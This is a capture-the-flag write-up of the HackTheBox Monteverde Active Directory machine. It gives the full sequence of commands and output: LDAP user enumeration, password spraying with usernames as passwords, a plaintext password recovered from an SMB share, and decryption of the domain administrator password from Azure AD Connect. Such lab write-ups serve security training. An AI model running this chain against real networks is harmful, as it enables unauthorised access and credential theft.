Hey, fellow Hackers! Today, we’re going to dive into the Monteverde HackTheBox Active Directory Machine. Let’s start scanning without wasting time :)
Scanning
Let’s start scanning target ip with nmap
nmap -F -sV 10.10.10.172
In result we found some open ports and Domain: MEGABANK.LOCAL
I tried Zone Transfer on port 53 but didn’t work and enumerating share with smbmap but didn’t work either
LDAP Enumeration
Enumerating Naming Context
ldapsearch -H ldap://10.10.10.172 -x -s base namingcontexts
Then i tried for searching user and found some
ldapsearch -x -H ldap://10.10.10.172 -D 'CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL' -b 'DC=MEGABANK,DC=LOCAL' | grep userPrincipalName | sed 's/userPrincipalName: //'
I save them inside a file name user.txt
$ cat user.txt
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorganUsing enum4linux i found Account Threshold is none
enum4linux 10.10.10.172
this means we can bruteforce found users password using crackmapexec tool
crackmapexec smb 10.10.10.172 -u user.txt -p user.txtHere, i am using user.txt as password list too
In result i found SABatchJobs as User and Password
Then i started enumerating using these credentials with smbclient
smbclient -L //10.10.10.172/ --user 'SABatchJobs' --password 'SABatchJobs'
Got list of shares, Here i first try accessing azure_uploads
But found nothing here :\
Then i access users$ share and got some users directories
Then using recurse ON method i list all files and sub-directories inside these directories
smb: \> recurse ON
smb: \> ls
. D 0 Fri Jan 3 18:42:48 2020
.. D 0 Fri Jan 3 18:42:48 2020
dgalanos D 0 Fri Jan 3 18:42:30 2020
mhope D 0 Fri Jan 3 19:11:18 2020
roleary D 0 Fri Jan 3 18:40:30 2020
smorgan D 0 Fri Jan 3 18:40:24 2020
\dgalanos
. D 0 Fri Jan 3 18:42:30 2020
.. D 0 Fri Jan 3 18:42:30 2020
\mhope
. D 0 Fri Jan 3 19:11:18 2020
.. D 0 Fri Jan 3 19:11:18 2020
azure.xml AR 1212 Fri Jan 3 19:10:23 2020
\roleary
. D 0 Fri Jan 3 18:40:30 2020
.. D 0 Fri Jan 3 18:40:30 2020
\smorgan
. D 0 Fri Jan 3 18:40:24 2020
.. D 0 Fri Jan 3 18:40:24 2020
31999 blocks of size 4096. 28979 blocks available
smb: \>Here i find azure.xml file inside mhope user directory using get i downloaded this file inside my system
smb: \mhope\> get azure.xml
getting file \mhope\azure.xml of size 1212 as azure.xml (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \mhope\> exitAfter reading content of azure.xml file i found a password
$ cat azure.xml
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
<T>System.Object</T>
</TN>
<ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
<Props>
<DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
<DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
<G N="KeyId">00000000-0000-0000-0000-000000000000</G>
<S N="Password">4n0therD4y@n0th3r$</S>
</Props>
</Obj>
</Objs> using Password Spraying with crackmapexec i found this password is valid for mhope user :)
$ crackmapexec smb 10.10.10.172 -u user.txt -p '4n0therD4y@n0th3r$'
SMB 10.10.10.172 445 MONTEVERDE [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB 10.10.10.172 445 MONTEVERDE [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$Then i login into mhope user with evil-winrm utility
evil-winrm -i 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
Got user.txt :)
After searching for this user group i found some interesting groups
Searching on google about Azure AD connect exploit i got some interesting pages.
After little bit reading i found this page which work like charm: https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/
Exploitation Steps For Administrator
I downloaded AdDecrypt binary from here: https://github.com/VbScrub/AdSyncDecrypt/releases
After downloading i upload them inside target system
For running this we need to change our location too C:\Program Files\Microsoft Azure AD Sync\Bin
*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> C:\Users\mhope\Documents\AdDecrypt.exe -FullSQL
======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================
Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!
DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL
After executing we found administrator password
Using evil-winrm i login as administrator and found root.txt too :)
BOOMM!! Monteverde Machine Completed Successfully :)
